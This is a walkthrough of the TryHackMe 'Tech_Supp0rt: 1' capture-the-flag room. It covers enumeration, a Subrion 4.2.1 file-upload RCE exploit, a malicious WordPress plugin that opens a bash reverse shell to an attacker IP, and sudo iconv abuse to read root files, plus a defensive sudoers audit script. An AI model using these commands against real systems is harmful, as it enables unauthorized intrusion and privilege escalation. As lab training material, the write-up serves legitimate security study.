In this walkthrough, we will be going through the Tech_Supp0rt: 1 room from TryHackMe. This is an Easy-rated room on the platform, and the objective is to hack into the scammer’s under-development website to foil their plans. So, let’s get started without any delay.
Machine Info:
| Field | Value |
| --- | --- |
| Title | Tech_Supp0rt: 1 |
| IP address | 10.10.112.144 |
| Difficulty | Easy |
| Objective | Hack into the scammer’s under-development website to foil their plans. |
Enumeration:
- I started off with a regular nmap scan and found four open ports – 22 (SSH), 80 (HTTP), 139 and 445 (SMB).
sudo nmap -sS -sV 10.10.112.144
- Next, I ran gobuster against the web server on port 80 and found two interesting directories – /test and /wordpress.
wh1terose@fsociety:~$ gobuster dir -u http://10.10.112.144/ -w ~/Desktop/Wordlist/common.txt
===============================================================
Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://10.10.112.144/
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /home/wh1terose/Desktop/Wordlist/common.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.1.0
[+] Timeout:                 10s
===============================================================
2023/11/19 11:21:36 Starting gobuster in directory enumeration mode
===============================================================
/.hta                 (Status: 403) [Size: 278]
/.htaccess            (Status: 403) [Size: 278]
/.htpasswd            (Status: 403) [Size: 278]
/index.html           (Status: 200) [Size: 11321]
/phpinfo.php          (Status: 200) [Size: 94941]
/server-status        (Status: 403) [Size: 278]
/test                 (Status: 301) [Size: 313] [--> http://10.10.112.144/test/]
/wordpress            (Status: 301) [Size: 318] [--> http://10.10.112.144/wordpress/]
===============================================================
2023/11/19 11:23:44 Finished
===============================================================
- The /test directory had a page with a bunch of pop-ups of the kind scammers use to target their victims. This seems to be a test page for that.
- Looking into the /wordpress directory reveals a WordPress installation. I enumerated it thoroughly but couldn’t find anything worthwhile on the front end.
- Next, I used wpscan to enumerate usernames and found a hit for one – support.
wpscan --url http://10.10.112.144/wordpress/ -e u
- I didn’t find anything juicy on the WordPress end: no known exploits for the themes, no vulnerable or misconfigured plugins. So, I started enumerating the SMB shares. I used smbclient and smbmap to list the shares and got read access to the websvr share.
smbclient -L \\10.10.112.144
smbmap -H 10.10.112.144
- Used an SMB null session and downloaded the enter.txt file from the websvr share. In there, I found credentials for a potential Subrion installation. We still had no clue about the WordPress creds to go through that route.
smbclient //10.10.112.144/websvr -N
- Decoded the password string with CyberChef, which revealed the password – Scam2021
admin:7sKvntXdPEJaxazce9PXi24zaFrLiKWCk
admin:Scam2021
- I looked online for Subrion and found that it is a CMS used to build different web apps. I tried to access it at /subrion but was unable to do so. Then I looked into the goals written in the enter.txt file, which said that if we are unable to access the Subrion installation at the default path, we have to do so via the panel. Using the path below, I got a login panel.
http://10.10.112.144/subrion/panel/
- Logged into the dashboard using our found credentials. The Subrion version running was 4.2.1.
- Checked the version for known exploits and found that it is vulnerable to an arbitrary file upload RCE.
searchsploit Subrion CMS 4.2.1
searchsploit -m php/webapps/49876.py
Initial Access:
- Used the exploit to get our initial access.
python3 49876.py -u http://10.10.112.144/subrion/panel/ -l admin -p Scam2021
- Next, I looked into the wp-config.php file for potential WordPress creds and got a combo. Bingo!
ls /var/www/html/wordpress
cat /var/www/html/wordpress/wp-config.php
support:ImAScammerLOL!123!
- Logged into the WordPress dashboard using the found credentials.
- Next, I tried to upload our PHP reverse shell into the 404.php file but encountered an error and was unable to save the file. So, I took a different route.
- I used the PHP code below to build a malicious WordPress plugin which, when activated, gives me a reverse connection back to my listener.
<?php
/**
Plugin Name: WordPress Reverse shell
Author: Your Mom
**/
exec("/bin/bash -c 'bash -i >& /dev/tcp/10.18.1.78/4444 0>&1'")
?>
- Converted it to a zip file and uploaded it to the target.
zip -u revshell.zip revshell.php
- Once activated, I got a connection back to my netcat listener. Great!
- Switched my user to scamsite using the previously found credentials.
Privilege Escalation:
- Next, I checked for any sudo misconfiguration using the command below and found that our user can run the iconv binary as root without a password.
sudo -l
- Used the GTFOBins technique for the iconv binary to read the contents of the root.txt file and captured our flag.
scamsite@TechSupport:/tmp$ LFILE=/root/root.txt
scamsite@TechSupport:/tmp$ sudo /usr/bin/iconv -f 8859_1 -t 8859_1 "$LFILE"
851b8233a8c09400ec30651bd1529bf1ed02790b
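The weakness behind this escalation is a single sudoers rule letting a low-privileged user run iconv as root with no password. As an added example that is not part of the original write-up, the Python audit below parses sudoers User_Spec lines and flags passwordless rules for binaries that can read arbitrary files as root, so the misconfiguration is caught in review rather than found by an attacker; the sudoers fragment and the binary list are constructed.

```python
import re

# Binaries that, run as root, read an arbitrary file and hand its contents back.
# iconv is the one abused above; the rest is a short constructed sample.
FILE_READ_BINARIES = {"iconv", "cat", "less", "more", "head", "tail", "base64"}
SKIP_PREFIXES = ("Defaults", "User_Alias", "Cmnd_Alias", "Host_Alias", "Runas_Alias")
# User_Spec grammar: user host=(runas) [TAG: ...] command[, command ...]
SPEC_RE = re.compile(r"^(?P<user>\S+)\s+(?P<host>[^\s=]+)\s*=\s*(?:\((?P<runas>[^)]*)\)\s*)?"
                     r"(?P<tags>(?:\w+:\s*)*)(?P<cmds>.+)$")

def parse_sudoers(text: str) -> list:
    """One dict per command in each User_Spec line; comments, blank lines,
    Defaults and alias definitions are skipped."""
    entries = []
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()
        m = SPEC_RE.match(line) if line and not line.startswith(SKIP_PREFIXES) else None
        if not m:
            continue
        tags = {t.rstrip(":").upper() for t in m.group("tags").split()}
        runas = (m.group("runas") or "root").split(":")[0] or "root"
        for cmd in filter(None, (c.strip() for c in m.group("cmds").split(","))):
            entries.append({"user": m.group("user"), "runas": runas,
                            "nopasswd": "NOPASSWD" in tags, "command": cmd})
    return entries

def find_file_read_escalations(text: str) -> list:
    """(user, command) pairs where a passwordless rule lets the user run a
    file-reading binary as root; a runas of ALL includes root."""
    findings = []
    for e in parse_sudoers(text):
        binary = e["command"].split()[0].rsplit("/", 1)[-1]
        if e["nopasswd"] and e["runas"] in ("root", "ALL") and binary in FILE_READ_BINARIES:
            findings.append((e["user"], e["command"]))
    return findings

# Constructed sudoers fragment modelled on the room's misconfiguration; the
# deploy and backup lines are rules the check should leave alone.
SAMPLE_SUDOERS = """
Defaults env_reset
root     ALL=(ALL:ALL) ALL
scamsite ALL=(ALL) NOPASSWD: /usr/bin/iconv
deploy   ALL=(ALL) NOPASSWD: /usr/bin/systemctl restart nginx
backup   ALL=(backup) NOPASSWD: /usr/bin/cat /var/log/syslog
"""

if __name__ == "__main__":
    for user, cmd in find_file_read_escalations(SAMPLE_SUDOERS):
        print(f"{user} can read any file as root via: {cmd}")
```

The fix for a hit is the usual one: drop the NOPASSWD tag, or replace the general-purpose binary with a wrapper script that performs only the intended conversion on a fixed path.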
Task 1 – Submit Flags
Question 1 – What is the root.txt flag?
851b8233a8c09400ec30651bd1529bf1ed02790b
Conclusion:
So that was “Tech_Supp0rt: 1” for you. We started off with a regular nmap scan and found four open ports – 22 (SSH), 80 (HTTP), 139 and 445 (SMB). Next, we used gobuster to find some hidden directories and got a directory named wordpress with the respective CMS installed. Along with that, we looked into the SMB shares and got a file named enter.txt. The file contains creds for the Subrion admin panel, which we used to access the Subrion dashboard. Further, we looked for known exploits for the installed Subrion version and found an RCE exploit, and used that to get initial access on the server. The wp-config file reveals the creds used to access the WordPress dashboard. Moving on, once inside the WordPress dashboard, we used a malicious WordPress plugin to get shell access and upgraded it to the scamsite user. At last, we escalated our privileges by exploiting a sudo misconfiguration for the iconv binary using the GTFOBins technique and found the root flag and my favorite underwear that had been missing for quite some time now. On that note, I would take your leave and will meet you in the next one. Till then, “Happy hacking”.